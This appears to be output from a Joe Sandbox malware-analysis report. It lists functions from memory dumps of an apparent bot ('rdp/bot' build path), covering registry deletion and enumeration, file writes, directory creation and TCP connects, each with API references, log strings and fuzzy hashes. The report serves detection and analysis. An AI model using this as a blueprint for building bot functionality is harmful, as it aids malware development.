Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CloseDeleteOpenValuefflushfwrite
String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 3240087161-1648311886
Opcode ID: 25a7ebb25baff321afba265dbb17ffd66978b20602fb46e2baa317a3d327f89e
Instruction ID: f1cb6b8e191b2a395cc1fe63c268d36b65fdd2632a497d40aa93a8e23fab2787
Opcode Fuzzy Hash: 25a7ebb25baff321afba265dbb17ffd66978b20602fb46e2baa317a3d327f89e
Instruction Fuzzy Hash: 4E817B6290CF0B85FB70AB87A84037C726DBF507A4F5401BAC91E466B5EE6DAD84C302

Function 00007FFE13308304 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 192registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE13308339
RegDeleteValueA.ADVAPI32 ref: 00007FFE1330843E
RegCloseKey.ADVAPI32 ref: 00007FFE13308567

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

(key != NULL), xrefs: 00007FFE133083D1
(root != NULL), xrefs: 00007FFE133083A1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133083AF, 00007FFE133083DF
, xrefs: 00007FFE13308481
P, xrefs: 00007FFE133084E9
, xrefs: 00007FFE13308478
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1330841F
P, xrefs: 00007FFE133084F2
NULL, xrefs: 00007FFE13308498, 00007FFE13308651, 00007FFE1330865D
, xrefs: 00007FFE13308366
P, xrefs: 00007FFE133085EC
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE1330835A
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE1330839A, 00007FFE133083CA
registry_del_value, xrefs: 00007FFE13308353, 00007FFE133083A8, 00007FFE133083D8, 00007FFE13308418, 00007FFE13308465, 00007FFE13308580
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13308587
, xrefs: 00007FFE13308377
[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE1330846C

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CloseDeleteOpenValuefflushfwrite
String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 3240087161-1648311886
Opcode ID: 9696ecc43d2f276dee9d8872b0da1a51c060c652e9af9cabf5f55fd6ed35039c
Instruction ID: cc1c71059ed1ab6db5b6de191674ca371dfae4d3fbfaae4b89351a10c6152510
Opcode Fuzzy Hash: 9696ecc43d2f276dee9d8872b0da1a51c060c652e9af9cabf5f55fd6ed35039c
Instruction Fuzzy Hash: 6181546090CF0BDDFA30AB56A84027D7A50AF70774F4401B2D97E6B6B6EE1DE985830D

Function 00007FFE11505D3B Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 133fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00007FFE11505D63
fclose.MSVCRT ref: 00007FFE11505D95
_errno.MSVCRT ref: 00007FFE11505E4F
_errno.MSVCRT ref: 00007FFE11505E70
fwrite.MSVCRT ref: 00007FFE11505EE4

Strings

(mode != NULL), xrefs: 00007FFE11505E24
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11505DED, 00007FFE11505E1D
[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FFE11505FC4
fs_file_write, xrefs: 00007FFE11505DC5, 00007FFE11505DFB, 00007FFE11505E2B, 00007FFE11505E5D, 00007FFE11505F0D, 00007FFE11505FBD
(path != NULL), xrefs: 00007FFE11505DF4
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FFE11505E64
NULL, xrefs: 00007FFE11505F9A, 00007FFE11505FA6
[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FFE11505F14
[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FFE11505DCC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11505E02, 00007FFE11505E32

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: _errno$fclosefopenfwrite
String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 608220805-961576452
Opcode ID: cef8740fe2e0e89111e01523f6a2a868090a1ed37bbcea809cbf5e3a9790c31d
Instruction ID: bb2e888e046b097c15b3ee3149eaf322efecfc1278d4906c11d52927dd138efb
Opcode Fuzzy Hash: cef8740fe2e0e89111e01523f6a2a868090a1ed37bbcea809cbf5e3a9790c31d
Instruction Fuzzy Hash: DA51D4A2A19E0395FB119B97D9402BC335EAF417B8F8845BAD91D473B4EF7CE9468300

Function 00007FFE1330349E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE133034BD
CreateDirectoryA.KERNEL32 ref: 00007FFE133034DF
GetLastError.KERNEL32 ref: 00007FFE13303530
strcpy.MSVCRT ref: 00007FFE13303581
strlen.MSVCRT ref: 00007FFE13303589
strlen.MSVCRT ref: 00007FFE133035A5
strlen.MSVCRT ref: 00007FFE133035B6
CreateDirectoryA.KERNEL32 ref: 00007FFE13303627
GetLastError.KERNEL32 ref: 00007FFE13303631

Strings

fs_dir_create, xrefs: 00007FFE1330350E, 00007FFE13303542, 00007FFE133035D9, 00007FFE133036FF, 00007FFE13303766
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE1330376D
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FFE133035E0
NULL, xrefs: 00007FFE13303757
(path != NULL), xrefs: 00007FFE13303507
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE13303549
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13303515
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE13303706
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13303500

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-906809513
Opcode ID: 6e08ed52c16ada79c7cb7ab3f8e2edfa16f46a302fd01bcf615b761762456f37
Instruction ID: 1203f123f64d66be374483f95f300199d7f8544fe30a011fd7b78172a56481fb
Opcode Fuzzy Hash: 6e08ed52c16ada79c7cb7ab3f8e2edfa16f46a302fd01bcf615b761762456f37
Instruction Fuzzy Hash: 6F717C52F0CE478EFB615B07E8807BE1250AF65B74F4401B2D92E376B6DE2CE8458709

Function 00007FFE1330377B Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 133fileCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE1330388F
_errno.MSVCRT ref: 00007FFE133038B0
fwrite.MSVCRT ref: 00007FFE13303924

Strings

[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FFE13303954
(mode != NULL), xrefs: 00007FFE13303864
fs_file_write, xrefs: 00007FFE13303805, 00007FFE1330383B, 00007FFE1330386B, 00007FFE1330389D, 00007FFE1330394D, 00007FFE133039FD
NULL, xrefs: 00007FFE133039DA, 00007FFE133039E6
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FFE133038A4
[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FFE13303A04
(path != NULL), xrefs: 00007FFE13303834
[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FFE1330380C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13303842, 00007FFE13303872
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1330382D, 00007FFE1330385D

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: _errno$fwrite
String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 116495842-961576452
Opcode ID: 5712fe9cb6afcf4edf8cf5f494c012d9732386242c551838a8e67268020f2fc8
Instruction ID: e4d41e83c8d2e6277fa58e78312bfa077d82e726f385b371b54a1b4f34a9153f
Opcode Fuzzy Hash: 5712fe9cb6afcf4edf8cf5f494c012d9732386242c551838a8e67268020f2fc8
Instruction Fuzzy Hash: 39516D61E09E43CDFA119B16E9416FD6351AF747B0F4801B2D97D672BADF2CE9068308

Function 00007FFE1150CD60 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 259registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32 ref: 00007FFE1150CDED
RegOpenKeyExA.ADVAPI32 ref: 00007FFE1150CF2F
RegCloseKey.ADVAPI32 ref: 00007FFE1150D16E

Strings

[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu), xrefs: 00007FFE1150CFAF
(subkey != NULL), xrefs: 00007FFE1150CEC7
[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE1150CF51
(subkey_len != NULL), xrefs: 00007FFE1150CEFA
(key != NULL), xrefs: 00007FFE1150CE94
NULL, xrefs: 00007FFE1150D22D
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FFE1150D15F
(root != NULL), xrefs: 00007FFE1150CE64
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FFE1150CE36
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE1150CE5D, 00007FFE1150CE8D, 00007FFE1150CEC0, 00007FFE1150CEF3
registry_enum_key, xrefs: 00007FFE1150CE2F, 00007FFE1150CE6B, 00007FFE1150CE9B, 00007FFE1150CECE, 00007FFE1150CF01, 00007FFE1150CF4A, 00007FFE1150CFA8, 00007FFE1150D158, 00007FFE1150D255
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150CE72, 00007FFE1150CEA2, 00007FFE1150CED5, 00007FFE1150CF08
[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu), xrefs: 00007FFE1150D25C

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CloseEnumOpen
String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
API String ID: 1332880857-1739142668
Opcode ID: bf57472a2d2e2c07b5e9271786b06ddd0bca9418485668c3a13e4070e26b74aa
Instruction ID: 30122a1d9ff8575d06d37fbb4694c7728548470501459f37f66241c8e4b65da1
Opcode Fuzzy Hash: bf57472a2d2e2c07b5e9271786b06ddd0bca9418485668c3a13e4070e26b74aa
Instruction Fuzzy Hash: 69B18262A0CE438AF73187C6E84037C225AAF85374F6905BAD94E476B4DF7CED868741

Function 00007FFE133074E0 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 259registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32 ref: 00007FFE1330756D
RegOpenKeyExA.ADVAPI32 ref: 00007FFE133076AF
RegCloseKey.ADVAPI32 ref: 00007FFE133078EE

Strings

(key != NULL), xrefs: 00007FFE13307614
(root != NULL), xrefs: 00007FFE133075E4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133075F2, 00007FFE13307622, 00007FFE13307655, 00007FFE13307688
NULL, xrefs: 00007FFE133079AD
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE133075DD, 00007FFE1330760D, 00007FFE13307640, 00007FFE13307673
(subkey != NULL), xrefs: 00007FFE13307647
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FFE133078DF
[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu), xrefs: 00007FFE1330772F
registry_enum_key, xrefs: 00007FFE133075AF, 00007FFE133075EB, 00007FFE1330761B, 00007FFE1330764E, 00007FFE13307681, 00007FFE133076CA, 00007FFE13307728, 00007FFE133078D8, 00007FFE133079D5
[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE133076D1
[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu), xrefs: 00007FFE133079DC
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FFE133075B6
(subkey_len != NULL), xrefs: 00007FFE1330767A

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CloseEnumOpen
String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
API String ID: 1332880857-1739142668
Opcode ID: 7d33a2ff30b65895c3c83801a503d5bd0afb74b286f737d826f2bdecbd79d124
Instruction ID: a12508eeb7c3e26a9f8d22f3f437b33e6b47473fabca3a8a4b1044650baa5758
Opcode Fuzzy Hash: 7d33a2ff30b65895c3c83801a503d5bd0afb74b286f737d826f2bdecbd79d124
Instruction Fuzzy Hash: 42B1A362A0CE07CFFA628B46E4403BC1291ABA4774F5901B2D57E772B5DE3CE985930D

Function 00007FFE0EB41B10 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 259registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32 ref: 00007FFE0EB41B9D
RegOpenKeyExA.ADVAPI32 ref: 00007FFE0EB41CDF
RegCloseKey.ADVAPI32 ref: 00007FFE0EB41F1E

Strings

(root != NULL), xrefs: 00007FFE0EB41C14
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB41C22, 00007FFE0EB41C52, 00007FFE0EB41C85, 00007FFE0EB41CB8
[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu), xrefs: 00007FFE0EB4200C
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FFE0EB41F0F
[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu), xrefs: 00007FFE0EB41D5F
registry_enum_key, xrefs: 00007FFE0EB41BDF, 00007FFE0EB41C1B, 00007FFE0EB41C4B, 00007FFE0EB41C7E, 00007FFE0EB41CB1, 00007FFE0EB41CFA, 00007FFE0EB41D58, 00007FFE0EB41F08, 00007FFE0EB42005
(key != NULL), xrefs: 00007FFE0EB41C44
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE0EB41C0D, 00007FFE0EB41C3D, 00007FFE0EB41C70, 00007FFE0EB41CA3
NULL, xrefs: 00007FFE0EB41FDD
(subkey != NULL), xrefs: 00007FFE0EB41C77
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FFE0EB41BE6
[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE0EB41D01
(subkey_len != NULL), xrefs: 00007FFE0EB41CAA

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CloseEnumOpen
String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
API String ID: 1332880857-1739142668
Opcode ID: cd98ccaae0c1c8f1b6a7550b02c3042b026df0d10870bb791dbac2a708f88371
Instruction ID: c039982a453913719efbca78f6f1cf6edcfd46c07781449b6e0cebaa1ad142ca
Opcode Fuzzy Hash: cd98ccaae0c1c8f1b6a7550b02c3042b026df0d10870bb791dbac2a708f88371
Instruction Fuzzy Hash: 45B11EA3E0E74A82F6708F48E5407B82751EB84758F554132D9CE47AB8DF3CE9C69B01

Function 00007FFE1330175C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE13301780
htonl.WS2_32 ref: 00007FFE1330181C
htons.WS2_32 ref: 00007FFE1330182D
connect.WS2_32 ref: 00007FFE13301846
WSAGetLastError.WS2_32 ref: 00007FFE1330186C
select.WS2_32 ref: 00007FFE133018DC
WSAGetLastError.WS2_32 ref: 00007FFE133018EC
WSAGetLastError.WS2_32 ref: 00007FFE1330192E

Part of subcall function 00007FFE133013F9: ioctlsocket.WS2_32 ref: 00007FFE1330141F

Part of subcall function 00007FFE13301344: setsockopt.WS2_32 ref: 00007FFE1330136C
Part of subcall function 00007FFE13301344: setsockopt.WS2_32 ref: 00007FFE13301398

WSAGetLastError.WS2_32 ref: 00007FFE1330195B

Strings

[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE13301973
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE1330191D
tcp_connect, xrefs: 00007FFE133017DD, 00007FFE133018F8, 00007FFE13301916, 00007FFE13301943, 00007FFE1330196C, 00007FFE13301996
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE133017E4
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE1330199D
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE1330194A
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE133018FF

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: fc4950bd200eb24369f41447302ecffc939822e5fb5845a7e032cfae9a9e038a
Instruction ID: 1131f5a5e73c9027fa27b334195f5eaf22b7150341a2753238489115313db592
Opcode Fuzzy Hash: fc4950bd200eb24369f41447302ecffc939822e5fb5845a7e032cfae9a9e038a
Instruction Fuzzy Hash: B251F525F0CE468AE7205B27E8402BD6290AF65BB4F0403B5E83D666F6DE7DE5458708

Function 00007FFE11505309 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE1150532A
GetLastError.KERNEL32 ref: 00007FFE1150540A

Strings

H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115053A0, 00007FFE115053D9
(attr != NULL), xrefs: 00007FFE115053E0
~, xrefs: 00007FFE1150548E
NULL, xrefs: 00007FFE1150553A
, xrefs: 00007FFE1150542B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115053B5, 00007FFE115053EE
P, xrefs: 00007FFE11505493
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FFE11505553
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1150537E
c, xrefs: 00007FFE115053D1
(path != NULL), xrefs: 00007FFE115053A7
